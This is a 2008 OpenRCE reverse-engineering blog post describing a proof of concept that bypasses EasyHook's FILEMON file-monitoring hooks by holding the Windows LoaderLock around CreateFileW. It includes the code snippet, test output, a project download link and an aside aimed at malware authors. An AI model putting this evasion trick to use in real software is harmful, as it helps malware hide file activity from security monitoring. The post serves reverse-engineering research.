OpenRCE

About Articles Book Store Distributed RCE Downloads Event Calendar Forums Live Discussion Reference Library RSS Feeds Search Users What's New

Customize Theme

Flag: Tornado! Hurricane!

Created: Sunday, December 14 2008 18:52.37 CST

Printer Friendly ...

Bypassing windows hook engines which if the LoaderLock is held not executes the

Author: Dreg

# Views: 5128

This project bypass windows hook engines which if the LoaderLock is held not executes the hook handler.

This project include the bypass of the easy-hook FILEMON.

This POC try creates with CreateFileW two files:
- no_bypass_hook.txt: which is logged by the FILEMON of the easy-hook
- bypass_hook.txt: which bypass the FILEMON of the easy-hook
-
- The bypass method is held the LoaderLock:
-. RtlEnterCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
-. CreateFile( ByPassFile.txt );
-. RtlLeaveCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
- This works, because TDB of easy-hook uses the Auxiliary Windows Library
before call the hook handler, if AuxUlibIsDLLSynchronizationHeld
return TRUE, easy-hook not execute hook handler
- Helding the LoaderLock AuxUlibIsDLLSynchronizationHeld returns always TRUE

The code to bypass the easy-hook FILEMON hook handler is very simple:



RtlEnterCriticalSection( NtCurrentTeb()->Peb->LoaderLock );

CreateFileW

(

	FILE_BYPASS_HOOK,

	0,

	0,

	NULL,

	OPEN_EXISTING,

	FILE_ATTRIBUTE_NORMAL,

	NULL

);

RtlLeaveCriticalSection( NtCurrentTeb()->Peb->LoaderLock );

Then the FILE_BYPASS_HOOK never showed in easy-hook FILEMON Log.

Test the code is very simple, only runs bypass_easyhook.exe which creates two files each two seconds:



0-

 CreateFileW(bypass_hook.txt) <- This CALL BYPASS easy-hook



 CreateFileW(no_bypass_hook.txt) <- This CALL NOT BYPASS easy-hook

...

Next, run the FILEMON with the PID of bypass_easyhook.exe.

(Run the filemon from the path of FILEMON):

C:\bypass_easyhook\Release>FileMon.exe 2628
...

Number of assemblies processed = 3
Number of assemblies installed = 3
Number of failures = 0

FileMon has been installed in target 2628.

[2628:2772]: "no_bypass_hook.txt"
[2628:2772]: "no_bypass_hook.txt"

Only logged no_bypass_hook.txt, and the FILEMON never logged the CreateFileW of bypass_hook.txt :-).

Bypass windows hook engines which if the LoaderLock is held not executes the hook handler, is very simple with this trick.

But you want code a serious malware or program, held the LoaderLock only in safe situations. It is very important to avoid deadlocks.

The project: http://www.fr33project.org/projects/bypass_easyhook.rar

There are 28,212 total registered users.

Recently Created Topics
Reverse Engineering ...	Jan/23
Career: DoD Agency I...	Jan/22
"Disappearing&q...	Jan/17
Career: Software Sec...	Jan/11
Where is the call st...	Jan/07
IDA Pro 6.1 Breakpoi...	Jan/01
How to create data s...	Dec/30
can i search all mod...	Dec/23
IDA symbol table exp...	Dec/20
An anti-attach trick	Dec/17

Recent Forum Posts
Reverse Engineering ...	NirIzr
"Disappearing&q...	NirIzr
Reverse Engineering ...	charlie
"Disappearing&q...	charlie
An anti-attach trick	Bass
An anti-attach trick	waleeda...
An anti-attach trick	Bass
An anti-attach trick	waleeda...
An anti-attach trick	Bass
Looking for value in...	NirIzr

Recent Blog Entries
	Ludwig	Feb/04
chi on sale
	Ludwig	Feb/04
Monster In The Vicinity Of ...
	Ludwig	Feb/04
Supra footwear Online
	waleedassar	Jan/31
Yet Another Anti-Debug Trick
	RolfRolles	Jan/22
Finding Bugs in VMs with a ...
More ...

Recent Blog Comments
	waleedassar on:	Feb/01
Yet Another Anti-Debug Trick
	NirIzr on:	Jan/31
Yet Another Anti-Debug Trick
	jackchen on:	Jan/10
nike mercurial vapor iii
	waleedassar on:	Dec/27
A new Anti-Olly trick.
	PeterFerrie on:	Dec/27
A new Anti-Olly trick.
More ...

Imagery

SoySauce Blueprint
Jun 6, 2008

[+] expand

View Gallery (11) / Submit